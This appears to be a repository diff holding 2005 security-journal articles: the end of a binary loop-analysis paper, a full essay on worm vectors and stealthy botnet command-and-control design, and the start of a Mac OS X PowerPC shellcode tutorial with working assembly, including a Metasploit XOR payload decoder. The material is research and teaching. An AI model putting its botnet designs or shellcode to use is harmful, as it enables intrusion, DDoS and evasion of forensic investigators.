At this point, the reader can see that every time the loop passes through its
entry point it will allocate memory. To determine if the attacker can cause a
double free error, further investigation is needed.
.text:00011A31 mov esi, eax
.text:00011A33 test esi, esi
.text:00011A35 jz short loc_11A8F
If the memory allocation within the loop fails, the loop terminates correctly.
The next call in the loop is to ZwQuerySystemInformation which tries to acquire
the SystemProcessAndThreadsInformation.
.text:00011A46 mov eax, [esp+14h+var_4]
.text:00011A4A add edi, edi
.text:00011A4C inc eax
.text:00011A4D cmp eax, 0Fh
.text:00011A50 mov [esp+14h+var_4], eax
.text:00011A54 jl short loc_11A1C
This part of the loop is quite un-interesting. In this segment the code
increments a counter in eax until eax is greater than 15. It is obvious that
it is not possible to cause a double free error in this case because the user
has no control over the loop condition or data within the loop. This ends the
investigation into a possible double free error.
Above is a good example of how to analyze loops that may be of interest. With
all binary analysis it is important to not only identify dangerous function
calls but to also identify if the attacker can control data that might be
manipulated or referenced within a loop.
6) Conclusion
During the course of this paper, the reader has had a chance to learn about the
different types of loops and some of the method of detecting them. The reader
has also gotten an in-depth view of the new IDA plug-in released with this
article. Hopefully now when the reader sees a loop, whether in code or binary,
the reader can explore the loop and determine if it is a security risk or not.
Bibliography
Tarjan, R. E. 1974. Testing flow graph reducibility. J
Comput. Syst. Sci. 9, 355-365.
Sreedhar, Vugranam, Guang Gao, Yong-Fong Lee. Identifying
loops using DJ graphs.
http://portal.acm.org/citation.cfm?id=236114.236115
Flake, Halvar. Automated Reverse Engineering.
http://www.blackhat.com/presentations/win-usa-04/bh-win-04-flake.pdf

572
uninformed/1.5.txt Normal file
View File

@ -0,0 +1,572 @@
Social Zombies - Aspects of Trojan Networks
May, 2005
warlord
warlord / nologin.org
1) Introduction
While I'm sitting here and writing this article, my firewall is
getting hammered by lots and lots of packets that I never asked for.
How come? In the last couple of years we saw the internet grow into
a dangerous place for the uninitiated, with worms and viruses
looming almost everywhere, often times infecting systems without
user interaction. This article will focus on the subclass of malware
commonly referred to as worms, and introduce some new ideas to the
concept of worm networks.
2) Worm Infection Vectors
The worms around today can mostly be put into one the four
categories discussed in the following sections.
2.1) Mail
The mail worm is the simplest type of worm. It's primary
mode of propagation is through social engineering. By sending large
quantities of mail with content that deceives people and/or triggers
their curiosity, recipients are tricked into running an attached
program. Once executed, the program will send out copies of itself
via email to recipients found in the victims address book. This type
of worm is usually stopped quickly when antivirus companies update
their signature files, and mail servers running those AV products
start filtering the worm mails out. Users, in general, are becoming
more and more aware of this type of malware, and many won't run
attachments sent in mail anymore. Regardless, this method of
infection still manages to be successful.
2.2) Browser
Browser-based worms, which primarily work against Internet Explorer,
make use of vulnerabilities that exist in web-browsers. What
generally happens is that when a users visits a malicious website,
an exploit will make Internet Explorer download and execute code. As
there are well known vulnerabilities in Internet Explorer at all
times that are not yet fixed, the bad guys usually have a couple of
days or weeks to spread their code. Of course, the infection rate
heavily depends on the number of visitors on the website hosting the
exploit. One approach that has been used in the past to gain access
to a wider 'audience' involved sending mail to thousands of users in
an attempt to get the users to visit a malicious website. Another
approach involved hacking advertisement companies and changing their
content in order to make them serve exploits and malware on high
profile sites.
2.3) Peer to Peer
The peer to peer worm is quite similar to the mail worm; it's all
about social engineering. Users hunting for the latest mp3s or
pictures of their most beloved celebrity find similarly named
programs and scripts, trying to deceive the user to download and
execute them. Once active on the users system, the malcode will make
sure it's being hosted by the users p2p application to spread
further. Even if downloaded, host based anti-virus scanners with
recent signatures will catch most of these programs before they can
be run.
2.4) Active
This one is the most dangerous worm, as it doesn't require any sort
of user interaction at all. It also requires the highest level of
skill to write. Active worms spread by scanning the internet for one
or more types of vulnerabilities. Once a vulnerable target is
found, an exploit attempt is made that, if successful, results in
the uploading of the worm to the attacked site where propagation can
continue in the same form. These worms are usually spotted first by
an increasing number of hosts scanning the internet, most often
scanning for a single port. These worms also usually exploit
weaknesses that are well-known to the public for hours, days, weeks
or months. Examples of this type of worm include the Wank worm,
Code Red, Sadmind, SQL Slammer, Blaster, Sasser and others. As the
use of firewalls and NAT routers increases, and as anti-exploit
techniques like the one employed by Windows XP SP2 become more
common, these worms will find less hosts to infect. To this point,
from the time of this writing, it's been a while since the last big
active worm hit the net.
Other active infection vectors include code spreading via unset or
weak passwords on CIFS Common Internet File System. The
protocol used to exchange data between Windows hosts via network
shares. shares, IRC and instant messaging networks, Usenet, and
virtually every other data exchange protocol.
3) Motives
3.1) Ego
Media attention often is a major motivation behind a worm. Coders
bolstering their ego by seeing reports on their worm on major sites
on the internet as well as tv news and newspapers with paniced
warnings of the latest doomsday threat which may take down the
planet and result in a 'Digital Pearl Harbor' seems
to be quite often the case. Huge media attention usually also means
huge law enforcement attention, and big efforts will be made to
catch the perpetrator. Though especially wide open (public) WIFI
networks can make it quite difficult to catch the perpetrator by
technological means, people boasting on IRC and, as in the case of
Sasser, bounties, can quickly result in the worm's author being
taken into custody.
3.2) DDoS
The reason for a DDoS botnet is usually either the wish to have
enough firepower to virtually shoot people/sites/organizations off
the net, or extortion, or a combination of both. The extortion of
gambling websites before big sports events is just one example of
many cases of extortion involving DDoS. The attacker usually takes
the website down for a couple of hours to demonstrate his ability to
do so whenever it pleases him, and sends a mail to the owner of the
website, asking for money to keep the firepower away from his site.
This sort of business model is well known for millenia, and merely
found new applications online.
3.3) Spamming
This one is also about money in the end. Infected machines are
(ab)used as spam zombies. Each machine sends their master's
unsolicited mail to lots and lots of unwilling recipients. The
owners of these systems usually offer their services to the spam
industry and thus make money of it.
3.4) Adware
Yet another reason involving money. Just like on TV and Google,
advertisements can be sold. The more people seeing the
advertisement, the more money can be requested from the people that
pay for their slogan to be displayed on some end users Windows. (Of
course, it could be Linux and MacOS too, but, face it, no adware
attacks those)
3.5) Hacking
A worm that infects and backdoors a couple thousand hosts is a great
way to quickly and easily obtain data from those systems. Examples
of data that may be worth stealing includes accounts for online
games, credit card numbers, personal information that can be used in
identity theft scams, and more. There has even been a report that
items of online games were being stolen to sell those later on
E-bay. Already having compromised one machine, enhancing the
influence into some network can be much easier of course. Take for
example the case of a heavily firewalled company. A hacker can't get
inside using an active approach, but notices that one of his malware
serving websites infected a host within that network. Using a
connect-back approach, where the infected node connects to the
attacker, a can tunnel can be built through the firewall thereby
allowing the attacker to reach the internal network.
4) Botnets
While I did mention DDoS and spam as reasons for infection already,
what I left out so far was the infrastructure of hundreds or
thousands of compromised machines, which is usually called a
botnet. Once a worm has infected lots of systems, an
attacker needs some way to control his zombies. Most often the nodes
are made to connect to an IRC server and join a (password protected)
secret channel. Depending on the malware in use, the attacker can
usually command single or all nodes sitting on the channel to, for
example, DDoS a host into oblivion, look for game CD keys and dump
those into the channel, install additional software on the infected
machines, or do a whole lot of other operations. While such an
approach may be quite effective, it has several shortcomings.
- IRC is a plaintext protocol.
Unless every node builds an SSL tunnel to an SSL-capable IRCD,
everything that goes on in the channel will be sent from the IRCD to
all nodes connected, which means that someone sniffing from an
infected honeypot can see everything going on in the channel,
including commands and passwords to control the botnet. Such a
weakness allows botnets to be stolen or destroyed (f.ex. by issuing
a command to make them connect to a new IRCD which is on IP
127.0.0.1).
- It's a single point of failure.
What if the IRCD goes down because some victim contacted the admin
of the IRC server? On top of this, an IRC Op (a IRC administrator)
could render the channel inaccessible. If an attacker is left
without a way to communicate with all of the zombie hosts, they
become useless.
A way around this dilemma is to make use of dynamic DNS sites like
www.dyndns.org. Instead of making the zombies connect to
irc.somehost.com, the attacker can install a dyndns client which
then allows drones to reference a hostname that can be directed to a
new address by the attacker. This allows the attacker to migrate
zombies from one IRC server to the next without issue. Though this
solves the problem of reliability, IRC should not be considered
secure enough to operate a botnet successfully.
The question, then, is what is a better solution? It seems the
author of the trojan Phatbot already tried to find a way
around this problem. His approach was to include peer to peer
functionality in his code. He ripped the code of the P2P project
``Waste'' and incorporated it into his creation. The problem was,
though, that Waste itself didn't include an easy way to exchange
cryptographic keys that are required to successfully operate the
network, and, as such, neither did Phatbot. The author is not aware
of any case where Phatbot's P2P functionality was actually used.
Then again, considering people won't run around telling everyone
about it (well, not all of them at least), it's possible that such a
case is just not publicly known.
To keep a botnet up and running, it requires reliability,
authentication, secrecy, encryption and scalability. How can all of
those goals be achieved? What would the basic functionality of a
perfect botnet require? Consider the following points:
- An easy way to quickly send commands to all nodes
- Untraceability of the source IP address of a command
- Impossibile to judge from an intercepted command packet which node it was
addressed to
- Authentication schemes to make sure only authorized personnel operate the
zombie network
- Encryption to conceal communication
- Safe software upgrade mechanisms to allow for functionality enhancements
- Containment; so that a single compromised node doesn't endanger the entire
network
- Reliability; to make sure the network is still up and running when most of
its nodes have gone
- Stealthiness on the infected host as well as on the network
At this point one should distinguish between unlinked and
linked, or passive, botnets. Unlinked means each node is on
its own. The nodes poll some central resource for information.
Information can include commands to download software updates, to
execute a program at a certain time, or the order a DDoS on a given
target machine. A linked botnet means the nodes don't do anything by
themselves but wait for command packets instead. Both approaches
have advantages and disadvantages. While a linked botnet can react
faster and may be more stealthy considering the fact that it doesn't
build up periodic network connections to look out for commands, it
also won't work for infected nodes sitting behind firewalls. Those
nodes may be able to reach a website to look for commands, which
means an unlinked approach would work for them, but command packets
like in the linked approach won't reach them, as the firewall will
filter those out. Also, consider the case of trying to build up a
botnet with the next Windows worm. Infected Windows machines are
generally home users with dynamic IP addresses. End-user machines
change IPs regularly or are turned off because the owner is at work
or on a hunting weekend. Good luck trying to keep an up-to-date list
of infected IPs. So basically, depending on the purpose of the
botnet, one needs to decide which approach to use. A combination of
both might be best. The nodes could, for example, poll a resource of
information once a day, where commands that don't require immediate
attention are waiting for them. On the other hand if there's
something urgent, sending command packets to certain nodes could
still be an option. Imagine a sort of unlinked botnet. No node knows
about another node and nor does it ever contact one of its brothers,
which perfectly achieves our goal of containment. These nodes
periodically contact what the author has labeled a resource
of information to retrieve their latest orders. What could such a
resource look like?
The following attributes are desirable:
- It shouldn't be a single point for failure, like a single host that makes
the whole system break down once it's removed.
- It should be highly anonymous, meaning connecting there shouldn't be
suspicious activity. To the contrary, the more people requesting information
from it the better. This way the nodes' connections would vanish in the
masses.
- The system shouldn't be owned by the botnet master. Anonymity is one of the
botnet's primary goals after all.
- It should be easy to post messages there, so that commands to the botnet can
be sent easily.
There are several options to achieve these goals. It could be:
- Usenet: Messages posted to a large newsgroup which contain
steganographically hidden commands that are cryptographically signed
achieves all of the above mentioned goals.
- P2P networks: The nodes link to a server once in a while and, like hundreds
of thousands of other people, search for a certain term (``xxx''), and find
command files. File size could be an indicator for the nodes that a certain
file may be a command file.
- The Web itself: This one would potentially be slow, but of course it's also
possible to setup a website that includes commands, and register that site
with a search engine. To find said site, the zombies would connect to the
search engine and submit a keyword. A special title of the website would
make it possible to identify the right page between thousands of other hits
on the keyword, without visiting each of them.
Using those methods, it would be possible to administer even large
botnets without even having to know the IP adresses of the nodes.
The ``distance'' between botnet owner and botnet drone would be as
large as possible since there would be no direct connection between
the two. These approaches also face several problems, though:
How would the botnet master determine the number of infected hosts
that are up and running? Only in the case of the website would
estimation of the number of nodes be possible by inspecting the
access logs, even logging were to be enabled. In the case of the
Usenet approach a command of ``DDoS Ebay/Yahoo/Amazon/CNN'' might
just reach the last 5 remaining hosts, and the attacker would only
be left with the knowledge that it somehow didn't work. The problem
is, however, that the attacker would not know the number of zombies
that would actually take part in the attack. The same problem occurs
with the type and location of the infected hosts. Some might be high
profile, such as those connecting from big corporations, game
developers, or financial institutions. The attacker might be
interested in abusing those for something other than Spam and DDoS,
if he knew about them in particular. If the attacker wants to bounce
his connections over 5 of his compromised nodes to make sure he
can't be traced, then it is required that he be able to communicate
with 5 nodes only and that he must know address information about
the nodes. If the attacker doesn't have a clue which IP addresses
his nodes have, how can he tell 5 of them where to connect to?
Besides the obvious problem of timing, of course. If the nodes poll
for a new command file once every 24 hours, he'd have to wait 24
hours in the worst case until the last node finds out it's supposed
to bind a port and forward the connection to somewhere else.
4.1) The Linked Network
Though I called this approach a passive network, as the nodes idle
and wait for commands to come to them, this type of botnet is in
fact quite active. The mechanisms described now will not (easily)
work when most of the nodes are on dynamic IP addresses. It is thus
more interesting for nodes installed after exploiting some kind of
server software. Of course, while not solving the uptime problem, a
rogue dyndns account can always give a dynamic IP a static hostname.
This kind of network focuses on all of its nodes forming some kind
of self-organizing peer to peer network. A node that infects some
other host can send over the botnet program and make the new host
link to itself, thus becoming that node's parent. This technique can
make the infected hosts form a sort of tree structure over time, as
each newly infected host tries to link to the infecting host.
Updates, information, and commands can be transmitted using this
worm network to reach each node, no matter which node it was sent
from, as each node informs both child nodes as well as its parent
nodes. In its early (or final) stages, a network of this type might
look like this piece of ascii art:
Level
0 N
/ \
1 N N
/ \ /
2 N N N
To make sure a 'successful' node that infects lots of hosts doesn't
become the parent of all of those hosts, nodes must refuse link
requests from child nodes after a certain number have been linked
(say 5). The parent can instead in form the would-be child to link
to one of its already established children instead. By keeping track
of the number of nodes linked to each location in the tree, a parent
can even try to keep the tree thats hierarchically below it well
balanced. This way a certain node would know about its parent and up
to 5 children, thus keeping the number of other hosts that someone
who compromises a node rather low, while still making sure to have a
network that's as effective as possible. Depending on the number of
nodes in the entire network, the amount of children that may link to
a parent node could be easily changed to make the network scale
better. As each node may be some final link as well as a parent
node, every host runs the same program. There's no need for special
'client' and 'server' nodes.
Whats the problem with a tree structure? Well, what if a parent
fails? Say a node has 3 children, each having 2 children of its own.
Now this node fails because the owner decides to reinstall the host.
Are we left with 3 networks that can't communicate with each other
any more? Not necessarily. While possibly giving a forensics expert
information on additional hosts, to increase reliability each node
has to know about at least one more upstream node that it can try to
link to if its parent is gone. An ideal candidate could be the
parent's parent. In order to make sure that all nodes are still
linked to the network, a periodic (once a day) sort of ``ping''
through the entire network has to happen in any case. By giving a
child node the IP of its ``grandparent'', the direct parent of the
child node always knows that the fail-over node, the one its kids
will try to link to if it should fail, is still up and running.
Though this may help to address the issue of parent death, another
issue remains. If the topmost node fails, there are no more
upstream nodes that the children could link to. Thats why in this
case the children should have the ip of one(!) of its siblings as
the fail-over address so that they can make this one the new top
node in the case of a fail-over condition. Making use of the
node-based ping, each node also knows how many of its children are
still up and running. By including this number into the ping sent to
the parent, the topmost node could always tell the number of linked
hosts. In order to not have to rely on connecting to the topmost
node to collect this type of information, a simple command can be
implemented to make the topmost node report this info to any node on
the network that asks for it. Using a public key stored into all the
nodes, it's even possible to encrypt every piece of information
thats destined for the botnet owner, making sure that no one besides
the owner can decrypt the data. Although this type of botnet may
give a forensics expert or someone with a sniffer information on
other nodes that are part of the network, it also offers fast
response times and more flexibility in the (ab)use of the network
compared to the previous approach with the unlinked nodes. It's a
sort of trade off between the biggest possible level of anonymity on
one hand, and flexibility on the other. It is a huge step up
compared to all of the zombies sitting on IRC servers right now,
where a single channel contains the zombies of the entire botnet. By
employing cryptography to store the IPs of the child and parent
nodes, and keeping those IPs only in RAM mitigates the problem
further.
Once a drone network of this type has been established with several
hundreds of hosts, there are lots of possibilities of putting it to
use. To conceal the originating IP address of a connection, hopping
over several nodes of the drone network to a target host can be
easily accomplished. A command packet tells one node to bind a port.
Once it receives a connection on it, it is told to command a second
node to do the same, and from then on node 1 forwards all the
traffic to node 2. Node 2 does the same, and forwards to node 3,
then 4, maybe 5, until finally the last node connects to the
intended destination IP. By encrypting the entire connection from
the original source IP address up to the last node, a possible
investigator sniffing node 2 will not see the commands (and thus the
IP addresses) which tell node 3 to connect to node 4, node 4 to node
5, and of course especially not the destination host's address. An
idle timeout makes sure that connections don't stay up forever.
As manually updating several hundreds or thousands of hosts is
tedious work, an easy updating system should be coded into the
nodes. There are basically two possible ways to realize that. A
command, distributed from node to node all over the network, could
make each node replace itself with a newer version which it may
download from a certain HTTP address. The other way is by updating
the server software on one node, which in turn distributes this
update to all the nodes it's linked to (children and
parent), which do just the same. Cryptographic signatures are a must
of course to make sure someone doesn't replace all of the precious
nodes with SETI@home. Vlad902 suggested a simple and effective way
to do that. Each node gets an MD5 hash hardcoded into it. Whenever
someone offers a software update, it will download the first X bytes
and see wether they hash to the hardcoded value. If they do, the
update will be installed. Of course, a forensics expert may extract
the hash out of an identified node. However, due to the nature of
cryptographic hashes, he won't be able to tell which byte sequence
generates that hash. This will prevent the forensics export from
creating a malicious update to take down the network. As the value
used to generate the hash has to be considered compromised after an
update, each update has to supply a new hash value to look out for.
Further security mechanisms could include making the network
completely memory resident, and parents keeping track of kids, and
reinfecting those if necessary. What never hit the hard-disk can
obviously not be found by forensics. Also, commands should be
time-stamped to make sure a certain command will only work once, and
replay attacks (sending a sniffed command packet to trigger a
response from a node) will fail. Using public key cryptography to
sign and encrypt data and communication is always a nice idea too,
but it also has 2 disadvantages:
- It usually produces quite a big overhead to incorporate into the code.
- Holding the one and only private key matching to a public key thats been
found on hundreds of hacked hosts is quite incriminating evidence.
An additional feature could be the incorporation of global unique
identifiers into the network, providing each node with a unique ID
that's set upon installation on each new victim. While the network
master would have to keep track of host addresses and unique IDs, he
could use this feature to his advantage. Imagine a sort of
traceroute within the node network. The master wants to know where a
certain host is linked to. Every node knows the IDs of all of the
child nodes linked hierarchically below it. So he asks the topmost
node to find out the path to the node he's interested in. The
topmost node realizes it's linked somewhere under child 2, and in
turn asks child 2. This node knows it's linked somewhere below child
4, and so on and so on. In the end, the master gets his information,
a couple of IDs, while no node thats not directly linked to another
gets to know the IPs of further hosts that are linked to the
network.
Since a portscan shouldn't reveal a compromised host, a raw socket
must be used to sniff command packets off the wire. Also, command
packets should be structured as unsuspicious as possible, to make it
look like the host just got hit by yet another packet of ``internet
background noise''. DNS replies or certain values in TCP SYN packets
could do the trick.
4.2) The Hybrid
There is a way to combine both the anonymity of an unlinked network
with the quick response time of the linked approach. This can be
done by employing a technique first envisioned in the description of
a so-called ``Warhol Worm''. While no node knows anything about
other nodes, the network master keeps track of the IPs of infected
hosts. To distribute a command to a couple or maybe all of the
nodes, he first of all prepares an encrypted file containing the IPs
of all active nodes, and combines that with the command to execute.
He then sends this commandfile to the first node on the list. This
node executes the command, takes itself from the list, and goes top
to bottom through the list, until it finds another active node,
which it transmits the command file to. This way each node will only
get to know about other nodes when receiving commandfiles, which are
subsequently erased after the file has been successfully transmitted
to another node. By calling certain nodes by their unique IDs, it's
even possible to make certain nodes take different actions than all
the others. By preparing different files and sending them to
different nodes at start already, quite a fast distribution time can
be achieved. Of course, should someone accomplish to not only sniff
the commandfile, but also decrypt it, he has an entire list of
infected hosts. Someone sniffing a node will still also see an
incoming connection from somewhere, and an outgoing connection to
somewhere else, and thus get to know about 2 more nodes. Thats just
the same as depicted in the passive approach. Whats different is
that a binary analysis of a node will not divulge information on
another host of the network. As sniffing is probably more of a
threat than binary analysis though, and considering a linked network
offers way more flexibility, the Hybrid is most likely an inferior
approach.
5) Conclusion
When it comes to botnets, the malcode development is still in it's
infancy, and while today's networks are very basic and easily
detected, the reader should by now have realized that there are far
better and stealthier ways to link compromised hosts into a network.
And who knows, maybe one or more advanced networks are already in
use nowadays, and even though some of their nodes have been spotted
and removed already, the network itself has just not been identified
as being one yet.
Bibliography
The Honeypot Project. Know Your Enemy: Tracking Botnets.
http://www.honeynet.org/papers/bots/
Weaver, Nicholas C. Warhol Worms: The Potential for Very
Fast Internet Plagues.
http://www.cs.berkeley.edu/ nweaver/warhol.html
Paxson, Vern, Stuart Staniford Nicholas Weaver. How to
0wn the Internet in Your Spare Time.
http://www.icir.org/vern/papers/cdc-usenix-sec02/
Zalewski, Michael. Writing Internet Worms for Fun and
Profit.
http://www.securitymap.net/sdm/docs/virus/worm.txt

510
uninformed/1.6.txt Normal file
View File

@ -0,0 +1,510 @@
Mac OS X PPC Shellcode Tricks
H D Moore
hdm[at]metasploit.com
Last modified: 05/09/2005
0) Foreword
Abstract:
Developing shellcode for Mac OS X is not particularly difficult, but there are
a number of tips and techniques that can make the process easier and more eff
ective. The independent data and instruction caches of the PowerPC processor
can cause a variety of problems with exploit and shellcode development. The
common practice of patching opcodes at run-time is much more involved when the
instruction cache is in incoherent mode. NULL-free shellcode can be improved by
taking advantage of index registers and the reserved bits found in many
opcodes, saving space otherwise taken by standard NULL evasion techniques. The
Mac OS X operating system introduces a few challenges to unsuspecting
developers; system calls change their return address based on whether they
succeed and oddities in the Darwin kernel can prevent standard execve()
shellcode from working properly with a threaded process. The virtual memory
layout on Mac OS X can be abused to overcome instruction cache obstacles and
develop even smaller shellcode.
Thanks:
The author would like to thank B-r00t, Dino Dai Zovi, LSD, Palante, Optyx, and
the entire Uninformed Journal staff.
1) Introduction
With the introduction of Mac OS X, Apple has been viewed with mixed feelings by
the security community. On one hand, the BSD core offers the familiar Unix
security model that security veterans already understand. On the other, the
amount of proprietary extensions, network-enabled software, and growing mass of
advisories is giving some a cause for concern. Exploiting buffer overflows,
format strings, and other memory-corruption vulnerabilities on Mac OS X is a
bit different from what most exploit developers are familiar with. The
incoherent instruction cache, combined with the RISC fixed-length instruction
set, raises the bar for exploit and payload developers.
On September 12th of 2003, B-r00t published a paper titled "Smashing the Mac
for Fun and Profit". B-root's paper covered the basics of Mac OS X shellcode
development and built on the PowerPC work by LSD, Palante, and Ghandi. This
paper is an attempt to extend, rather than replace, the material already
available on writing shellcode for the Mac OS X operating system. The first
section covers the fundamentals of the PowerPC architecture and what you need
to know to start writing shellcode. The second section focuses on avoiding NULL
bytes and other characters through careful use of the PowerPC instruction set.
The third section investigates some of the unique behavior of the Mac OS X
platform and introduces some useful techniques.
2) PowerPC Basics
The PowerPC (PPC) architecture uses a reduced instruction set consisting of
32-bit fixed-width opcodes. Each opcode is exactly four bytes long and can only
be executed by the processor if the opcode is word-aligned in memory.
2.1) Registers
PowerPC processors have thirty-two 32-bit general-purpose registers (r0-r31)
PowerPC 64-bit processors have 64-bit general-purpose registers, but still use
32-bit opcodes, thirty-two 64-bit floating-point registers (f0-f31), a link
register (lr), a count register (ctr), and a handful of other registers for
tracking things like branch conditions, integer overflows, and various machine
state flags. Some PowerPC processors also contain a vector-processing unit
(AltiVec, etc), which can add another thirty-two 128-bit registers to the set.
On the Darwin/Mac OS X platform, r0 is used to store the system call number, r1
is used as a stack pointer, and r3 to r7 are used to pass arguments to a system
call. General-purpose registers between r3 and r12 are considered volatile and
should be preserved before the execution of any system call or library
function.
;;
;; Demonstrate execution of the reboot system call
;;
main:
li r0, 55 ; #define SYS_reboot 55
sc
2.2) Branches
Unlike the IA32 platform, PowerPC does not have a call or jmp instruction.
Execution flow is controlled by one of the many branch instructions. A branch
can redirect execution to a relative address, absolute address, or the value
stored in either the link or count registers. Conditional branches are
performed based on one of four bit fields in the condition register. The count
register can also be used as a condition for branching and some instructions
will automatically decrement the count register. A branch instruction can
automatically set the link register to be the address following the branch,
which is a very simple way to get the absolute address of any relative location
in memory.
;;
;; Demonstrate GetPC() through a branch and link instruction
;;
main:
xor. r5, r5, r5 ; xor r5 with r5, storing the value in r5
; the condition register is updated by the . modifier
ppcGetPC:
bnel ppcGetPC ; branch if condition is not-equal, which will be false
; the address of ppcGetPC+4 is now in the link register
mflr r5 ; move the link register to r5, which points back here
2.3) Memory
Memory access on PowerPC is performed through the load and store instructions.
Immediate values can be loaded to a register or stored to a location in memory,
but the immediate value is limited to 16 bits. When using a load instruction on
a non-immediate value, a base register is used, followed by an offset from that
register to the desired location. Store instructions work in a similar fashion;
the value to be stored is placed into a register, and the store instruction
then writes that value to the destination register plus an offset value.
Multi-word memory instructions exist, but are considered bad practice to use,
since they may not be supported in future PowerPC processors.
Since each PowerPC instruction is 32 bits wide, it is not possible to load a
32-bit address into a register with a single instruction. The standard method
of loading a full 32-bit value requires a load-immediate-shift (lis) followed
by an or-immediate (ori). The first instruction loads the high 16 bits, while
the second loads the lower 16 bits Some people prefer to use
add-immediate-shift against the r0 general purpose register. The r0 register
has a special property in that anytime it is used for addition or substraction,
it is treated as a zero, regardless of the current value 64-bit PowerPC
processors require five separate instructions to load a 32-bit immediate value
into a general-purpose register. This 16-bit limitation also applies to
relative branches and every other instruction that uses an immediate value.
;;
;; Load a 32-bit immediate value and store it to the stack
;;
main:
lis r5, 0x1122 ; load the high bits of the value
; r5 contains 0x11220000
ori r5, r5, 0x3344 ; load the low bits of the value
; r5 now contains 0x11223344
stw r5, 20(r1) ; store this value to SP+20
lwz r3, 20(r1) ; load this value back to r3
2.4) L1 Cache
The PowerPC processor uses one or more on-chip memory caches to accelerate
access to frequently referenced data and instructions. This cache memory is
separated into a distinct data and instruction cache. Although the data cache
operates in coherent mode on Mac OS X, shellcode developers need to be aware of
how the data cache and the instruction cache interoperate when executing
self-modifying code.
As a superscalar architecture, the PowerPC processor contains multiple
execution units, each of which has a pipeline. The pipeline can be described as
a conveyor belt in a factory; as an instruction moves down the belt, specific
steps are performed. To increase the efficiency of the pipeline, multiple
instructions can put on the belt at the same time, one behind another. The
processor will attempt to predict which direction a branch instruction will
take and then feed the pipeline with instructions from the predicted path. If
the prediction was wrong, the contents of the pipeline are trashed and correct
instructions are loaded into the pipeline instead.
This pipelined execution means that more than one instruction can be processed
at the same time in each execution unit. If one instruction requires the output
of another, a gap can occur in the pipeline while these dependencies are
satisfied. In the case of store instruction, the contents of the data cache
will be updated before the results are flushed back to main memory. If a load
instruction is executed directly after the store, it will obtain the
newly-updated value. This occurs because the load instruction will read the
value from the data cache, where it has already been updated.
The instruction cache is a different beast altogether. On the PowerPC platform,
the instruction cache is incoherent. If an executable region of memory is
modified and that region is already loaded into the instruction cache, the
modifed instructions will not be executed unless the cache is specifically
flushed. The instruction cache is filled from main memory, not the data cache.
If you attempt to modify executable code through a store instruction, flush the
cache, and then attempt to execute that code, there is still a chance that the
original, unmodified code will be executed instead. This can occur because the
data cache was not flushed back to main memory before the instruction cache was
filled.
The solution is a bit tricky, you must use the "dcbf" instruction to invalidate
each block of memory from the data cache, wait for the invalidation to complete
with the "sync" instruction, and then flush the instruction cache for that
block with "icbi". Finally, the "isync" instruction needs to be executed before
the modified code is actually used. Placing these instructions in any other
order may result in stale data being left in the instruction cache. Due to
these restrictions, self-modifying shellcode on the PowerPC platform is rare
and often unreliable.
The example below is a working PowerPC shellcode decoder included with the
Metasploit Framework (OSXPPCLongXOR).
;;
;; Demonstrate a cache-safe payload decoder
;; Based on Dino Dai Zovi's PPC decoder (20030821)
;;
main:
xor. r5, r5, r5 ; Ensure that the cr0 flag is always 'equal'
bnel main ; Branch if cr0 is not-equal and link to LMain
mflr r31 ; Move the address of LMain into r31
addi r31, r31, 68+1974 ; 68 = distance from branch -> payload
; 1974 is null eliding constant
subi r5, r5, 1974 ; We need this for the dcbf and icbi
lis r6, 0x9999 ; XOR key = hi16(0x99999999)
ori r6, r6, 0x9999 ; XOR key = lo16(0x99999999)
addi r4, r5, 1974 + 4 ; Move the number of words to code into r4
mtctr r4 ; Set the count register to the word count
xorlp:
lwz r4, -1974(r31) ; Load the encoded word into memory
xor r4, r4, r6 ; XOR this word against our key in r6
stw r4, -1974(r31) ; Store the modified work back to memory
dcbf r5, r31 ; Flush the modified word to main memory
.long 0x7cff04ac ; Wait for the data block flush (sync)
icbi r5, r31 ; Invalidate prefetched block from i-cache
subi r30, r5, -1978 ; Move to next word without using a NULL
add. r31, r31, r30
bdnz- xorlp ; Branch if --count == 0
.long 0x4cff012c ; Wait for i-cache to synchronize (isync)
; Insert XORed payload here
.long (0x7fe00008 ^ 0x99999999)
3) Avoiding NULLs
One of the most common problems encountered with shellcode development in
general and RISC processors in particular is avoiding NULL bytes in the
assembled code. On the IA32 platform, NULL bytes are fairly easy to dodge,
mostly due to the variable-length instruction set and multiple opcodes
available for a given task. Fixed-width opcode architectures, like PowerPC,
have fixed field sizes and often pad those fields with all zero bits.
Instructions that have a set of undefined bits often set these bits to zero as
well. The result is that many of the available opcodes are impossible to use
with NULL-free shellcode without modification.
On many platforms, self-modifying code can be used to work around NULL byte
restrictions. This technique is not useful for single-instruction patching on
PowerPC, since the instruction pre-fetch and instruction cache can result in
the non-modified instruction being executed instead.
3.1) Undefined Bits
To write interesting shellcode for Mac OS X, you need to use system calls. One
of the first problems encountered with the PowerPC platform is that the system
call instruction assembles to 0x44000002, which contains two NULL bytes. If we
take a look at the IBM PowerPC reference for the 'sc' instruction, we see that
the bit layout is as follows:
010001 00000 00000 0000 0000000 000 1 0
------ ----- ----- ---- ------- --- - -
A B C D E F G H
These 32 bits are broken down into eight specific fields. The first field (A),
which is 5 bits wide, must be set to the value 17. The bits that make up B, C,
and D are all marked as undefined. Field E is must either be set to 1 or 0.
Fields F and H are undefined, and G must always be set to 1. We can modify the
undefined bits to anything we like, in order to make the corresponding byte
values NULL-free. The first step is to reorder these bits along byte boundaries
and mark what we are able to change.
? = undefined
# = zero or one
[010001??] [????????] [????0000] [00#???1?]
The first byte of this instruction can be either 68, 69, 70, or 71 (DEFG). The
second byte can be any character at all. The third byte can either be 0, 16,
32, 48, 64, 80, 96, 112, 128, 144, 160, 176, 192, 208, 224, or 240 (which
contains '0', 'P', and 'p', among others). The fourth value can be any of the
following values: 2, 3, 6, 7, 10, 11, 14, 15, 18, 19, 22, 23, 26, 27, 30, 31,
34, 35, 38, 39, 42, 43, 46, 47, 50, 51, 54, 55, 58, 59, 62, 63. As you can see,
it is possible to create thousands of different opcodes that are all treated by
the processor as a system call. The same technique can be applied to almost any
other instruction that has undefined bits. Although the current line of PowerPC
chips used with Mac OS X seem to ignore the undefined bits, future processors
may actually use these bits. It is entirely possible that undefined bit abuse
can prevent your code from working on newer processors
;;
;; Patching the undefined bits in the 'sc' opcode
;;
main:
li r0, 1 ; sys_exit
li r3, 0 ; exit status
.long 0x45585037 ; sc patched as "EXP7"
3.2) Index Registers
On the PowerPC platform, immediate values are encoded using all 16 bits. If the
assembled value of your immediate contains a NULL, you will need to find another
way to load it into the target register. The most common technique is to first
load a NULL-free value into a register, then substract that value minus the
difference to your immediate.
;;
